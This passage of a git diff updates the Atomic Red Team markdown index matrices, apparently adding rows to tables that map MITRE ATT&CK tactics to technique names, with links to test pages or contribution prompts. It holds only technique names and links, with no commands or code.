Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](../../T1547.011/T1547.011.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Impair Command History Logging](../../T1562.003/T1562.003.md) | | | | | | | | +| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Office Test](../../T1137.002/T1137.002.md) | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | | +| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | | +| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | | +| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | | +| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | | +| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Rc.common](../../T1037.004/T1037.004.md) | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | | | +| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | | +| | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Scheduled Task](../../T1053.005/T1053.005.md) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | | +| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | | +| | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Rc.common](../../T1037.004/T1037.004.md) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | | +| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](../../T1037.005/T1037.005.md) | Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | | +| | | [Scheduled Task](../../T1053.005/T1053.005.md) | [Systemd Service](../../T1543.002/T1543.002.md) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | | +| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | | +| | | [Screensaver](../../T1546.002/T1546.002.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Address Translation Traversal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Security Support Provider](../../T1547.005/T1547.005.md) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Boundary Bridging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | | +| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Trap](../../T1546.005/T1546.005.md) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | | +| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | | +| | | [Startup Items](../../T1037.005/T1037.005.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | | +| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | | +| | | [Systemd Service](../../T1543.002/T1543.002.md) | [Windows Service](../../T1543.003/T1543.003.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | | +| | | Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | | +| | | TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Patch System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Transport Agent](../../T1505.002/T1505.002.md) | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | | +| | | [Trap](../../T1546.005/T1546.005.md) | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Web Shell](../../T1505.003/T1505.003.md) | | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Windows Service](../../T1543.003/T1543.003.md) | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | | | [Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | | +| | | | | [Process Injection](../../T1055/T1055.md) | | | | | | | | +| | | | | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | | | [PubPrn](../../T1216.001/T1216.001.md) | | | | | | | | +| | | | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | | | Reduce Key Space [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | [Regsvcs/Regasm](../../T1218.009/T1218.009.md) | | | | | | | | | | | | | [Regsvr32](../../T1218.010/T1218.010.md) | | | | | | | | @@ -122,6 +132,7 @@ | | | | | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | | | | | | | | | | | | | [System Checks](../../T1497.001/T1497.001.md) | | | | | | | | | | | | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | | | TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | @@ -133,9 +144,12 @@ | | | | | Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | | | VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | | | Verclsid [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | | | Weaken Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | [Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | | | | | | | | | | | | | [XSL Script Processing](../../T1220/T1220.md) | | | | | | | | diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md index 0c3905e9..6c68ed7b 100644 --- a/atomics/Indexes/Matrices/windows-matrix.md +++ b/atomics/Indexes/Matrices/windows-matrix.md @@ -1,78 +1,80 @@ # Windows Atomic Tests by ATT&CK Tactic & Technique | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact | |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| -| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) | -| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | -| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| [External Remote Services](../../T1133/T1133.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) | -| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Query Registry](../../T1012/T1012.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Default Accounts](../../T1078.001/T1078.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [Software Discovery](../../T1518/T1518.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | Man in the Browser [CONTRIBUTE A 